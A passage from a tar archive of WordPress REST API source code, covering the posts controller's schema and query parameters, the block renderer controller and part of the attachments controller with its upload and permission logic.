$schema['properties']['generated_slug'] = array(
'description' => __( 'Slug automatically generated from the object title.' ),
'type' => 'string',
'context' => array( 'edit' ),
'readonly' => true,
);
}
if ( $post_type_obj->hierarchical ) {
$schema['properties']['parent'] = array(
'description' => __( 'The ID for the parent of the object.' ),
'type' => 'integer',
'context' => array( 'view', 'edit' ),
);
}
$post_type_attributes = array(
'title',
'editor',
'author',
'excerpt',
'thumbnail',
'comments',
'revisions',
'page-attributes',
'post-formats',
'custom-fields',
);
$fixed_schemas = array(
'post' => array(
'title',
'editor',
'author',
'excerpt',
'thumbnail',
'comments',
'revisions',
'post-formats',
'custom-fields',
),
'page' => array(
'title',
'editor',
'author',
'excerpt',
'thumbnail',
'comments',
'revisions',
'page-attributes',
'custom-fields',
),
'attachment' => array(
'title',
'author',
'comments',
'revisions',
'custom-fields',
),
);
foreach ( $post_type_attributes as $attribute ) {
if ( isset( $fixed_schemas[ $this->post_type ] ) && ! in_array( $attribute, $fixed_schemas[ $this->post_type ], true ) ) {
continue;
} elseif ( ! isset( $fixed_schemas[ $this->post_type ] ) && ! post_type_supports( $this->post_type, $attribute ) ) {
continue;
}
switch ( $attribute ) {
case 'title':
$schema['properties']['title'] = array(
'description' => __( 'The title for the object.' ),
'type' => 'object',
'context' => array( 'view', 'edit', 'embed' ),
'arg_options' => array(
'sanitize_callback' => null, // Note: sanitization implemented in self::prepare_item_for_database()
'validate_callback' => null, // Note: validation implemented in self::prepare_item_for_database()
),
'properties' => array(
'raw' => array(
'description' => __( 'Title for the object, as it exists in the database.' ),
'type' => 'string',
'context' => array( 'edit' ),
),
'rendered' => array(
'description' => __( 'HTML title for the object, transformed for display.' ),
'type' => 'string',
'context' => array( 'view', 'edit', 'embed' ),
'readonly' => true,
),
),
);
break;
case 'editor':
$schema['properties']['content'] = array(
'description' => __( 'The content for the object.' ),
'type' => 'object',
'context' => array( 'view', 'edit' ),
'arg_options' => array(
'sanitize_callback' => null, // Note: sanitization implemented in self::prepare_item_for_database()
'validate_callback' => null, // Note: validation implemented in self::prepare_item_for_database()
),
'properties' => array(
'raw' => array(
'description' => __( 'Content for the object, as it exists in the database.' ),
'type' => 'string',
'context' => array( 'edit' ),
),
'rendered' => array(
'description' => __( 'HTML content for the object, transformed for display.' ),
'type' => 'string',
'context' => array( 'view', 'edit' ),
'readonly' => true,
),
'block_version' => array(
'description' => __( 'Version of the content block format used by the object.' ),
'type' => 'integer',
'context' => array( 'edit' ),
'readonly' => true,
),
'protected' => array(
'description' => __( 'Whether the content is protected with a password.' ),
'type' => 'boolean',
'context' => array( 'view', 'edit', 'embed' ),
'readonly' => true,
),
),
);
break;
case 'author':
$schema['properties']['author'] = array(
'description' => __( 'The ID for the author of the object.' ),
'type' => 'integer',
'context' => array( 'view', 'edit', 'embed' ),
);
break;
case 'excerpt':
$schema['properties']['excerpt'] = array(
'description' => __( 'The excerpt for the object.' ),
'type' => 'object',
'context' => array( 'view', 'edit', 'embed' ),
'arg_options' => array(
'sanitize_callback' => null, // Note: sanitization implemented in self::prepare_item_for_database()
'validate_callback' => null, // Note: validation implemented in self::prepare_item_for_database()
),
'properties' => array(
'raw' => array(
'description' => __( 'Excerpt for the object, as it exists in the database.' ),
'type' => 'string',
'context' => array( 'edit' ),
),
'rendered' => array(
'description' => __( 'HTML excerpt for the object, transformed for display.' ),
'type' => 'string',
'context' => array( 'view', 'edit', 'embed' ),
'readonly' => true,
),
'protected' => array(
'description' => __( 'Whether the excerpt is protected with a password.' ),
'type' => 'boolean',
'context' => array( 'view', 'edit', 'embed' ),
'readonly' => true,
),
),
);
break;
case 'thumbnail':
$schema['properties']['featured_media'] = array(
'description' => __( 'The ID of the featured media for the object.' ),
'type' => 'integer',
'context' => array( 'view', 'edit', 'embed' ),
);
break;
case 'comments':
$schema['properties']['comment_status'] = array(
'description' => __( 'Whether or not comments are open on the object.' ),
'type' => 'string',
'enum' => array( 'open', 'closed' ),
'context' => array( 'view', 'edit' ),
);
$schema['properties']['ping_status'] = array(
'description' => __( 'Whether or not the object can be pinged.' ),
'type' => 'string',
'enum' => array( 'open', 'closed' ),
'context' => array( 'view', 'edit' ),
);
break;
case 'page-attributes':
$schema['properties']['menu_order'] = array(
'description' => __( 'The order of the object in relation to other object of its type.' ),
'type' => 'integer',
'context' => array( 'view', 'edit' ),
);
break;
case 'post-formats':
// Get the native post formats and remove the array keys.
$formats = array_values( get_post_format_slugs() );
$schema['properties']['format'] = array(
'description' => __( 'The format for the object.' ),
'type' => 'string',
'enum' => $formats,
'context' => array( 'view', 'edit' ),
);
break;
case 'custom-fields':
$schema['properties']['meta'] = $this->meta->get_field_schema();
break;
}
}
if ( 'post' === $this->post_type ) {
$schema['properties']['sticky'] = array(
'description' => __( 'Whether or not the object should be treated as sticky.' ),
'type' => 'boolean',
'context' => array( 'view', 'edit' ),
);
}
$schema['properties']['template'] = array(
'description' => __( 'The theme file to use to display the object.' ),
'type' => 'string',
'context' => array( 'view', 'edit' ),
'arg_options' => array(
'validate_callback' => array( $this, 'check_template' ),
),
);
$taxonomies = wp_list_filter( get_object_taxonomies( $this->post_type, 'objects' ), array( 'show_in_rest' => true ) );
foreach ( $taxonomies as $taxonomy ) {
$base = ! empty( $taxonomy->rest_base ) ? $taxonomy->rest_base : $taxonomy->name;
$schema['properties'][ $base ] = array(
/* translators: %s: taxonomy name */
'description' => sprintf( __( 'The terms assigned to the object in the %s taxonomy.' ), $taxonomy->name ),
'type' => 'array',
'items' => array(
'type' => 'integer',
),
'context' => array( 'view', 'edit' ),
);
}
$schema_links = $this->get_schema_links();
if ( $schema_links ) {
$schema['links'] = $schema_links;
}
return $this->add_additional_fields_schema( $schema );
}
/**
* Retrieve Link Description Objects that should be added to the Schema for the posts collection.
*
* @since 4.9.8
*
* @return array
*/
protected function get_schema_links() {
$href = rest_url( "{$this->namespace}/{$this->rest_base}/{id}" );
$links = array();
if ( 'attachment' !== $this->post_type ) {
$links[] = array(
'rel' => 'https://api.w.org/action-publish',
'title' => __( 'The current user can publish this post.' ),
'href' => $href,
'targetSchema' => array(
'type' => 'object',
'properties' => array(
'status' => array(
'type' => 'string',
'enum' => array( 'publish', 'future' ),
),
),
),
);
}
$links[] = array(
'rel' => 'https://api.w.org/action-unfiltered-html',
'title' => __( 'The current user can post unfiltered HTML markup and JavaScript.' ),
'href' => $href,
'targetSchema' => array(
'type' => 'object',
'properties' => array(
'content' => array(
'raw' => array(
'type' => 'string',
),
),
),
),
);
if ( 'post' === $this->post_type ) {
$links[] = array(
'rel' => 'https://api.w.org/action-sticky',
'title' => __( 'The current user can sticky this post.' ),
'href' => $href,
'targetSchema' => array(
'type' => 'object',
'properties' => array(
'sticky' => array(
'type' => 'boolean',
),
),
),
);
}
if ( post_type_supports( $this->post_type, 'author' ) ) {
$links[] = array(
'rel' => 'https://api.w.org/action-assign-author',
'title' => __( 'The current user can change the author on this post.' ),
'href' => $href,
'targetSchema' => array(
'type' => 'object',
'properties' => array(
'author' => array(
'type' => 'integer',
),
),
),
);
}
$taxonomies = wp_list_filter( get_object_taxonomies( $this->post_type, 'objects' ), array( 'show_in_rest' => true ) );
foreach ( $taxonomies as $tax ) {
$tax_base = ! empty( $tax->rest_base ) ? $tax->rest_base : $tax->name;
/* translators: %s: taxonomy name */
$assign_title = sprintf( __( 'The current user can assign terms in the %s taxonomy.' ), $tax->name );
/* translators: %s: taxonomy name */
$create_title = sprintf( __( 'The current user can create terms in the %s taxonomy.' ), $tax->name );
$links[] = array(
'rel' => 'https://api.w.org/action-assign-' . $tax_base,
'title' => $assign_title,
'href' => $href,
'targetSchema' => array(
'type' => 'object',
'properties' => array(
$tax_base => array(
'type' => 'array',
'items' => array(
'type' => 'integer',
),
),
),
),
);
$links[] = array(
'rel' => 'https://api.w.org/action-create-' . $tax_base,
'title' => $create_title,
'href' => $href,
'targetSchema' => array(
'type' => 'object',
'properties' => array(
$tax_base => array(
'type' => 'array',
'items' => array(
'type' => 'integer',
),
),
),
),
);
}
return $links;
}
/**
* Retrieves the query params for the posts collection.
*
* @since 4.7.0
*
* @return array Collection parameters.
*/
public function get_collection_params() {
$query_params = parent::get_collection_params();
$query_params['context']['default'] = 'view';
$query_params['after'] = array(
'description' => __( 'Limit response to posts published after a given ISO8601 compliant date.' ),
'type' => 'string',
'format' => 'date-time',
);
if ( post_type_supports( $this->post_type, 'author' ) ) {
$query_params['author'] = array(
'description' => __( 'Limit result set to posts assigned to specific authors.' ),
'type' => 'array',
'items' => array(
'type' => 'integer',
),
'default' => array(),
);
$query_params['author_exclude'] = array(
'description' => __( 'Ensure result set excludes posts assigned to specific authors.' ),
'type' => 'array',
'items' => array(
'type' => 'integer',
),
'default' => array(),
);
}
$query_params['before'] = array(
'description' => __( 'Limit response to posts published before a given ISO8601 compliant date.' ),
'type' => 'string',
'format' => 'date-time',
);
$query_params['exclude'] = array(
'description' => __( 'Ensure result set excludes specific IDs.' ),
'type' => 'array',
'items' => array(
'type' => 'integer',
),
'default' => array(),
);
$query_params['include'] = array(
'description' => __( 'Limit result set to specific IDs.' ),
'type' => 'array',
'items' => array(
'type' => 'integer',
),
'default' => array(),
);
if ( 'page' === $this->post_type || post_type_supports( $this->post_type, 'page-attributes' ) ) {
$query_params['menu_order'] = array(
'description' => __( 'Limit result set to posts with a specific menu_order value.' ),
'type' => 'integer',
);
}
$query_params['offset'] = array(
'description' => __( 'Offset the result set by a specific number of items.' ),
'type' => 'integer',
);
$query_params['order'] = array(
'description' => __( 'Order sort attribute ascending or descending.' ),
'type' => 'string',
'default' => 'desc',
'enum' => array( 'asc', 'desc' ),
);
$query_params['orderby'] = array(
'description' => __( 'Sort collection by object attribute.' ),
'type' => 'string',
'default' => 'date',
'enum' => array(
'author',
'date',
'id',
'include',
'modified',
'parent',
'relevance',
'slug',
'include_slugs',
'title',
),
);
if ( 'page' === $this->post_type || post_type_supports( $this->post_type, 'page-attributes' ) ) {
$query_params['orderby']['enum'][] = 'menu_order';
}
$post_type = get_post_type_object( $this->post_type );
if ( $post_type->hierarchical || 'attachment' === $this->post_type ) {
$query_params['parent'] = array(
'description' => __( 'Limit result set to items with particular parent IDs.' ),
'type' => 'array',
'items' => array(
'type' => 'integer',
),
'default' => array(),
);
$query_params['parent_exclude'] = array(
'description' => __( 'Limit result set to all items except those of a particular parent ID.' ),
'type' => 'array',
'items' => array(
'type' => 'integer',
),
'default' => array(),
);
}
$query_params['slug'] = array(
'description' => __( 'Limit result set to posts with one or more specific slugs.' ),
'type' => 'array',
'items' => array(
'type' => 'string',
),
'sanitize_callback' => 'wp_parse_slug_list',
);
$query_params['status'] = array(
'default' => 'publish',
'description' => __( 'Limit result set to posts assigned one or more statuses.' ),
'type' => 'array',
'items' => array(
'enum' => array_merge( array_keys( get_post_stati() ), array( 'any' ) ),
'type' => 'string',
),
'sanitize_callback' => array( $this, 'sanitize_post_statuses' ),
);
$taxonomies = wp_list_filter( get_object_taxonomies( $this->post_type, 'objects' ), array( 'show_in_rest' => true ) );
foreach ( $taxonomies as $taxonomy ) {
$base = ! empty( $taxonomy->rest_base ) ? $taxonomy->rest_base : $taxonomy->name;
$query_params[ $base ] = array(
/* translators: %s: taxonomy name */
'description' => sprintf( __( 'Limit result set to all items that have the specified term assigned in the %s taxonomy.' ), $base ),
'type' => 'array',
'items' => array(
'type' => 'integer',
),
'default' => array(),
);
$query_params[ $base . '_exclude' ] = array(
/* translators: %s: taxonomy name */
'description' => sprintf( __( 'Limit result set to all items except those that have the specified term assigned in the %s taxonomy.' ), $base ),
'type' => 'array',
'items' => array(
'type' => 'integer',
),
'default' => array(),
);
}
if ( 'post' === $this->post_type ) {
$query_params['sticky'] = array(
'description' => __( 'Limit result set to items that are sticky.' ),
'type' => 'boolean',
);
}
/**
* Filter collection parameters for the posts controller.
*
* The dynamic part of the filter `$this->post_type` refers to the post
* type slug for the controller.
*
* This filter registers the collection parameter, but does not map the
* collection parameter to an internal WP_Query parameter. Use the
* `rest_{$this->post_type}_query` filter to set WP_Query parameters.
*
* @since 4.7.0
*
* @param array $query_params JSON Schema-formatted collection parameters.
* @param WP_Post_Type $post_type Post type object.
*/
return apply_filters( "rest_{$this->post_type}_collection_params", $query_params, $post_type );
}
/**
* Sanitizes and validates the list of post statuses, including whether the
* user can query private statuses.
*
* @since 4.7.0
*
* @param string|array $statuses One or more post statuses.
* @param WP_REST_Request $request Full details about the request.
* @param string $parameter Additional parameter to pass to validation.
* @return array|WP_Error A list of valid statuses, otherwise WP_Error object.
*/
public function sanitize_post_statuses( $statuses, $request, $parameter ) {
$statuses = wp_parse_slug_list( $statuses );
// The default status is different in WP_REST_Attachments_Controller
$attributes = $request->get_attributes();
$default_status = $attributes['args']['status']['default'];
foreach ( $statuses as $status ) {
if ( $status === $default_status ) {
continue;
}
$post_type_obj = get_post_type_object( $this->post_type );
if ( current_user_can( $post_type_obj->cap->edit_posts ) || 'private' === $status && current_user_can( $post_type_obj->cap->read_private_posts ) ) {
$result = rest_validate_request_arg( $status, $request, $parameter );
if ( is_wp_error( $result ) ) {
return $result;
}
} else {
return new WP_Error( 'rest_forbidden_status', __( 'Status is forbidden.' ), array( 'status' => rest_authorization_required_code() ) );
}
}
return $statuses;
}
}
��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������endpoints/class-wp-rest-block-renderer-controller.php�����������������������������������������������0000666�����������������00000010726�15111427772�0017062 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<?php
/**
* Block Renderer REST API: WP_REST_Block_Renderer_Controller class
*
* @package WordPress
* @subpackage REST_API
* @since 5.0.0
*/
/**
* Controller which provides REST endpoint for rendering a block.
*
* @since 5.0.0
*
* @see WP_REST_Controller
*/
class WP_REST_Block_Renderer_Controller extends WP_REST_Controller {
/**
* Constructs the controller.
*
* @since 5.0.0
*/
public function __construct() {
$this->namespace = 'wp/v2';
$this->rest_base = 'block-renderer';
}
/**
* Registers the necessary REST API routes, one for each dynamic block.
*
* @since 5.0.0
*/
public function register_routes() {
$block_types = WP_Block_Type_Registry::get_instance()->get_all_registered();
foreach ( $block_types as $block_type ) {
if ( ! $block_type->is_dynamic() ) {
continue;
}
register_rest_route(
$this->namespace,
'/' . $this->rest_base . '/(?P<name>' . $block_type->name . ')',
array(
'args' => array(
'name' => array(
'description' => __( 'Unique registered name for the block.' ),
'type' => 'string',
),
),
array(
'methods' => WP_REST_Server::READABLE,
'callback' => array( $this, 'get_item' ),
'permission_callback' => array( $this, 'get_item_permissions_check' ),
'args' => array(
'context' => $this->get_context_param( array( 'default' => 'view' ) ),
'attributes' => array(
/* translators: %s is the name of the block */
'description' => sprintf( __( 'Attributes for %s block' ), $block_type->name ),
'type' => 'object',
'additionalProperties' => false,
'properties' => $block_type->get_attributes(),
'default' => array(),
),
'post_id' => array(
'description' => __( 'ID of the post context.' ),
'type' => 'integer',
),
),
),
'schema' => array( $this, 'get_public_item_schema' ),
)
);
}
}
/**
* Checks if a given request has access to read blocks.
*
* @since 5.0.0
*
* @param WP_REST_Request $request Request.
* @return true|WP_Error True if the request has read access, WP_Error object otherwise.
*/
public function get_item_permissions_check( $request ) {
global $post;
$post_id = isset( $request['post_id'] ) ? intval( $request['post_id'] ) : 0;
if ( 0 < $post_id ) {
$post = get_post( $post_id );
if ( ! $post || ! current_user_can( 'edit_post', $post->ID ) ) {
return new WP_Error(
'block_cannot_read',
__( 'Sorry, you are not allowed to read blocks of this post.' ),
array(
'status' => rest_authorization_required_code(),
)
);
}
} else {
if ( ! current_user_can( 'edit_posts' ) ) {
return new WP_Error(
'block_cannot_read',
__( 'Sorry, you are not allowed to read blocks as this user.' ),
array(
'status' => rest_authorization_required_code(),
)
);
}
}
return true;
}
/**
* Returns block output from block's registered render_callback.
*
* @since 5.0.0
*
* @param WP_REST_Request $request Full details about the request.
* @return WP_REST_Response|WP_Error Response object on success, or WP_Error object on failure.
*/
public function get_item( $request ) {
global $post;
$post_id = isset( $request['post_id'] ) ? intval( $request['post_id'] ) : 0;
if ( 0 < $post_id ) {
$post = get_post( $post_id );
// Set up postdata since this will be needed if post_id was set.
setup_postdata( $post );
}
$registry = WP_Block_Type_Registry::get_instance();
$block = $registry->get_registered( $request['name'] );
if ( null === $block ) {
return new WP_Error(
'block_invalid',
__( 'Invalid block.' ),
array(
'status' => 404,
)
);
}
$data = array(
'rendered' => $block->render( $request->get_param( 'attributes' ) ),
);
return rest_ensure_response( $data );
}
/**
* Retrieves block's output schema, conforming to JSON Schema.
*
* @since 5.0.0
*
* @return array Item schema data.
*/
public function get_item_schema() {
return array(
'$schema' => 'http://json-schema.org/schema#',
'title' => 'rendered-block',
'type' => 'object',
'properties' => array(
'rendered' => array(
'description' => __( 'The rendered block.' ),
'type' => 'string',
'required' => true,
'context' => array( 'edit' ),
),
),
);
}
}
������������������������������������������endpoints/class-wp-rest-attachments-controller.php��������������������������������������������������0000666�����������������00000064046�15111427772�0016503 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<?php
/**
* REST API: WP_REST_Attachments_Controller class
*
* @package WordPress
* @subpackage REST_API
* @since 4.7.0
*/
/**
* Core controller used to access attachments via the REST API.
*
* @since 4.7.0
*
* @see WP_REST_Posts_Controller
*/
class WP_REST_Attachments_Controller extends WP_REST_Posts_Controller {
/**
* Determines the allowed query_vars for a get_items() response and
* prepares for WP_Query.
*
* @since 4.7.0
*
* @param array $prepared_args Optional. Array of prepared arguments. Default empty array.
* @param WP_REST_Request $request Optional. Request to prepare items for.
* @return array Array of query arguments.
*/
protected function prepare_items_query( $prepared_args = array(), $request = null ) {
$query_args = parent::prepare_items_query( $prepared_args, $request );
if ( empty( $query_args['post_status'] ) ) {
$query_args['post_status'] = 'inherit';
}
$media_types = $this->get_media_types();
if ( ! empty( $request['media_type'] ) && isset( $media_types[ $request['media_type'] ] ) ) {
$query_args['post_mime_type'] = $media_types[ $request['media_type'] ];
}
if ( ! empty( $request['mime_type'] ) ) {
$parts = explode( '/', $request['mime_type'] );
if ( isset( $media_types[ $parts[0] ] ) && in_array( $request['mime_type'], $media_types[ $parts[0] ], true ) ) {
$query_args['post_mime_type'] = $request['mime_type'];
}
}
// Filter query clauses to include filenames.
if ( isset( $query_args['s'] ) ) {
add_filter( 'wp_allow_query_attachment_by_filename', '__return_true' );
}
return $query_args;
}
/**
* Checks if a given request has access to create an attachment.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full details about the request.
* @return WP_Error|true Boolean true if the attachment may be created, or a WP_Error if not.
*/
public function create_item_permissions_check( $request ) {
$ret = parent::create_item_permissions_check( $request );
if ( ! $ret || is_wp_error( $ret ) ) {
return $ret;
}
if ( ! current_user_can( 'upload_files' ) ) {
return new WP_Error( 'rest_cannot_create', __( 'Sorry, you are not allowed to upload media on this site.' ), array( 'status' => 400 ) );
}
// Attaching media to a post requires ability to edit said post.
if ( ! empty( $request['post'] ) ) {
$parent = get_post( (int) $request['post'] );
$post_parent_type = get_post_type_object( $parent->post_type );
if ( ! current_user_can( $post_parent_type->cap->edit_post, $request['post'] ) ) {
return new WP_Error( 'rest_cannot_edit', __( 'Sorry, you are not allowed to upload media to this post.' ), array( 'status' => rest_authorization_required_code() ) );
}
}
return true;
}
/**
* Creates a single attachment.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full details about the request.
* @return WP_Error|WP_REST_Response Response object on success, WP_Error object on failure.
*/
public function create_item( $request ) {
if ( ! empty( $request['post'] ) && in_array( get_post_type( $request['post'] ), array( 'revision', 'attachment' ), true ) ) {
return new WP_Error( 'rest_invalid_param', __( 'Invalid parent type.' ), array( 'status' => 400 ) );
}
// Get the file via $_FILES or raw data.
$files = $request->get_file_params();
$headers = $request->get_headers();
if ( ! empty( $files ) ) {
$file = $this->upload_from_file( $files, $headers );
} else {
$file = $this->upload_from_data( $request->get_body(), $headers );
}
if ( is_wp_error( $file ) ) {
return $file;
}
$name = basename( $file['file'] );
$name_parts = pathinfo( $name );
$name = trim( substr( $name, 0, -(1 + strlen( $name_parts['extension'] ) ) ) );
$url = $file['url'];
$type = $file['type'];
$file = $file['file'];
// Include image functions to get access to wp_read_image_metadata().
require_once ABSPATH . 'wp-admin/includes/image.php';
// use image exif/iptc data for title and caption defaults if possible
$image_meta = wp_read_image_metadata( $file );
if ( ! empty( $image_meta ) ) {
if ( empty( $request['title'] ) && trim( $image_meta['title'] ) && ! is_numeric( sanitize_title( $image_meta['title'] ) ) ) {
$request['title'] = $image_meta['title'];
}
if ( empty( $request['caption'] ) && trim( $image_meta['caption'] ) ) {
$request['caption'] = $image_meta['caption'];
}
}
$attachment = $this->prepare_item_for_database( $request );
$attachment->post_mime_type = $type;
$attachment->guid = $url;
if ( empty( $attachment->post_title ) ) {
$attachment->post_title = preg_replace( '/\.[^.]+$/', '', basename( $file ) );
}
// $post_parent is inherited from $attachment['post_parent'].
$id = wp_insert_attachment( wp_slash( (array) $attachment ), $file, 0, true );
if ( is_wp_error( $id ) ) {
if ( 'db_update_error' === $id->get_error_code() ) {
$id->add_data( array( 'status' => 500 ) );
} else {
$id->add_data( array( 'status' => 400 ) );
}
return $id;
}
$attachment = get_post( $id );
/**
* Fires after a single attachment is created or updated via the REST API.
*
* @since 4.7.0
*
* @param WP_Post $attachment Inserted or updated attachment
* object.
* @param WP_REST_Request $request The request sent to the API.
* @param bool $creating True when creating an attachment, false when updating.
*/
do_action( 'rest_insert_attachment', $attachment, $request, true );
// Include admin function to get access to wp_generate_attachment_metadata().
require_once ABSPATH . 'wp-admin/includes/media.php';
wp_update_attachment_metadata( $id, wp_generate_attachment_metadata( $id, $file ) );
if ( isset( $request['alt_text'] ) ) {
update_post_meta( $id, '_wp_attachment_image_alt', sanitize_text_field( $request['alt_text'] ) );
}
$fields_update = $this->update_additional_fields_for_object( $attachment, $request );
if ( is_wp_error( $fields_update ) ) {
return $fields_update;
}
$request->set_param( 'context', 'edit' );
/**
* Fires after a single attachment is completely created or updated via the REST API.
*
* @since 5.0.0
*
* @param WP_Post $attachment Inserted or updated attachment object.
* @param WP_REST_Request $request Request object.
* @param bool $creating True when creating an attachment, false when updating.
*/
do_action( 'rest_after_insert_attachment', $attachment, $request, true );
$response = $this->prepare_item_for_response( $attachment, $request );
$response = rest_ensure_response( $response );
$response->set_status( 201 );
$response->header( 'Location', rest_url( sprintf( '%s/%s/%d', $this->namespace, $this->rest_base, $id ) ) );
return $response;
}
/**
* Updates a single attachment.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Full details about the request.
* @return WP_Error|WP_REST_Response Response object on success, WP_Error object on failure.
*/
public function update_item( $request ) {
if ( ! empty( $request['post'] ) && in_array( get_post_type( $request['post'] ), array( 'revision', 'attachment' ), true ) ) {
return new WP_Error( 'rest_invalid_param', __( 'Invalid parent type.' ), array( 'status' => 400 ) );
}
$response = parent::update_item( $request );
if ( is_wp_error( $response ) ) {
return $response;
}
$response = rest_ensure_response( $response );
$data = $response->get_data();
if ( isset( $request['alt_text'] ) ) {
update_post_meta( $data['id'], '_wp_attachment_image_alt', $request['alt_text'] );
}
$attachment = get_post( $request['id'] );
$fields_update = $this->update_additional_fields_for_object( $attachment, $request );
if ( is_wp_error( $fields_update ) ) {
return $fields_update;
}
$request->set_param( 'context', 'edit' );
/** This action is documented in wp-includes/rest-api/endpoints/class-wp-rest-attachments-controller.php */
do_action( 'rest_after_insert_attachment', $attachment, $request, false );
$response = $this->prepare_item_for_response( $attachment, $request );
$response = rest_ensure_response( $response );
return $response;
}
/**
* Prepares a single attachment for create or update.
*
* @since 4.7.0
*
* @param WP_REST_Request $request Request object.
* @return WP_Error|stdClass $prepared_attachment Post object.
*/
protected function prepare_item_for_database( $request ) {
$prepared_attachment = parent::prepare_item_for_database( $request );
// Attachment caption (post_excerpt internally)
if ( isset( $request['caption'] ) ) {
if ( is_string( $request['caption'] ) ) {
$prepared_attachment->post_excerpt = $request['caption'];
} elseif ( isset( $request['caption']['raw'] ) ) {
$prepared_attachment->post_excerpt = $request['caption']['raw'];
}
}
// Attachment description (post_content internally)
if ( isset( $request['description'] ) ) {
if ( is_string( $request['description'] ) ) {
$prepared_attachment->post_content = $request['description'];
} elseif ( isset( $request['description']['raw'] ) ) {
$prepared_attachment->post_content = $request['description']['raw'];
}
}
if ( isset( $request['post'] ) ) {
$prepared_attachment->post_parent = (int) $request['post'];
}
return $prepared_attachment;
}
/**
* Prepares a single attachment output for response.
*
* @since 4.7.0
*
* @param WP_Post $post Attachment object.
* @param WP_REST_Request $request Request object.
* @return WP_REST_Response Response object.
*/
public function prepare_item_for_response( $post, $request ) {
$response = parent::prepare_item_for_response( $post, $request );
$fields = $this->get_fields_for_response( $request );
$data = $response->get_data();
if ( in_array( 'description', $fields, true ) ) {
$data['description'] = array(
'raw' => $post->post_content,
/** This filter is documented in wp-includes/post-template.php */
'rendered' => apply_filters( 'the_content', $post->post_content ),
);
}
if ( in_array( 'caption', $fields, true ) ) {
/** This filter is documented in wp-includes/post-template.php */
$caption = apply_filters( 'the_excerpt', apply_filters( 'get_the_excerpt', $post->post_excerpt, $post ) );
$data['caption'] = array(
'raw' => $post->post_excerpt,
'rendered' => $caption,
);
}
if ( in_array( 'alt_text', $fields, true ) ) {
$data['alt_text'] = get_post_meta( $post->ID, '_wp_attachment_image_alt', true );
}
if ( in_array( 'media_type', $fields, true ) ) {
$data['media_type'] = wp_attachment_is_image( $post->ID ) ? 'image' : 'file';
}
if ( in_array( 'mime_type', $fields, true ) ) {
$data['mime_type'] = $post->post_mime_type;
}
if ( in_array( 'media_details', $fields, true ) ) {
$data['media_details'] = wp_get_attachment_metadata( $post->ID );
// Ensure empty details is an empty object.
if ( empty( $data['media_details'] ) ) {
$data['media_details'] = new stdClass;
} elseif ( ! empty( $data['media_details']['sizes'] ) ) {
foreach ( $data['media_details']['sizes'] as $size => &$size_data ) {
if ( isset( $size_data['mime-type'] ) ) {
$size_data['mime_type'] = $size_data['mime-type'];
unset( $size_data['mime-type'] );
}
// Use the same method image_downsize() does.
$image_src = wp_get_attachment_image_src( $post->ID, $size );
if ( ! $image_src ) {
continue;
}
$size_data['source_url'] = $image_src[0];
}
$full_src = wp_get_attachment_image_src( $post->ID, 'full' );
if ( ! empty( $full_src ) ) {
$data['media_details']['sizes']['full'] = array(
'file' => wp_basename( $full_src[0] ),
'width' => $full_src[1],
'height' => $full_src[2],
'mime_type' => $post->post_mime_type,
'source_url' => $full_src[0],
);
}
} else {
$data['media_details']['sizes'] = new stdClass;
}
}
if ( in_array( 'post', $fields, true ) ) {
$data['post'] = ! empty( $post->post_parent ) ? (int) $post->post_parent : null;
}
if ( in_array( 'source_url', $fields, true ) ) {
$data['source_url'] = wp_get_attachment_url( $post->ID );
}
$context = ! empty( $request['context'] ) ? $request['context'] : 'view';
$data = $this->filter_response_by_context( $data, $context );
$links = $response->get_links();
// Wrap the data in a response object.
$response = rest_ensure_response( $data );
foreach ( $links as $rel => $rel_links ) {
foreach ( $rel_links as $link ) {
$response->add_link( $rel, $link['href'], $link['attributes'] );
}
}
/**
* Filters an attachment returned from the REST API.
*
* Allows modification of the attachment right before it is returned.
*
* @since 4.7.0
*
* @param WP_REST_Response $response The response object.
* @param WP_Post $post The original attachment post.
* @param WP_REST_Request $request Request used to generate the response.
*/
return apply_filters( 'rest_prepare_attachment', $response, $post, $request );
}
/**
* Retrieves the attachment's schema, conforming to JSON Schema.
*
* @since 4.7.0
*
* @return array Item schema as an array.
*/
public function get_item_schema() {
$schema = parent::get_item_schema();
$schema['properties']['alt_text'] = array(
'description' => __( 'Alternative text to display when attachment is not displayed.' ),
'type' => 'string',
'context' => array( 'view', 'edit', 'embed' ),
'arg_options' => array(
'sanitize_callback' => 'sanitize_text_field',
),
);
$schema['properties']['caption'] = array(
'description' => __( 'The attachment caption.' ),
'type' => 'object',
'context' => array( 'view', 'edit', 'embed' ),
'arg_options' => array(
'sanitize_callback' => null, // Note: sanitization implemented in self::prepare_item_for_database()
'validate_callback' => null, // Note: validation implemented in self::prepare_item_for_database()
),
'properties' => array(
'raw' => array(
'description' => __( 'Caption for the attachment, as it exists in the database.' ),
'type' => 'string',
'context' => array( 'edit' ),
),
'rendered' => array(
'description' => __( 'HTML caption for the attachment, transformed for display.' ),
'type' => 'string',
'context' => array( 'view', 'edit', 'embed' ),
'readonly' => true,
),
),
);
$schema['properties']['description'] = array(
'description' => __( 'The attachment description.' ),
'type' => 'object',
'context' => array( 'view', 'edit' ),
'arg_options' => array(
'sanitize_callback' => null, // Note: sanitization implemented in self::prepare_item_for_database()
'validate_callback' => null, // Note: validation implemented in self::prepare_item_for_database()
),
'properties' => array(
'raw' => array(
'description' => __( 'Description for the object, as it exists in the database.' ),
'type' => 'string',
'context' => array( 'edit' ),
),
'rendered' => array(
'description' => __( 'HTML description for the object, transformed for display.' ),
'type' => 'string',
'context' => array( 'view', 'edit' ),
'readonly' => true,
),
),
);
$schema['properties']['media_type'] = array(
'description' => __( 'Attachment type.' ),
'type' => 'string',
'enum' => array( 'image', 'file' ),
'context' => array( 'view', 'edit', 'embed' ),
'readonly' => true,
);
$schema['properties']['mime_type'] = array(
'description' => __( 'The attachment MIME type.' ),
'type' => 'string',
'context' => array( 'view', 'edit', 'embed' ),
'readonly' => true,
);
$schema['properties']['media_details'] = array(
'description' => __( 'Details about the media file, specific to its type.' ),
'type' => 'object',
'context' => array( 'view', 'edit', 'embed' ),
'readonly' => true,
);
$schema['properties']['post'] = array(
'description' => __( 'The ID for the associated post of the attachment.' ),
'type' => 'integer',
'context' => array( 'view', 'edit' ),
);
$schema['properties']['source_url'] = array(
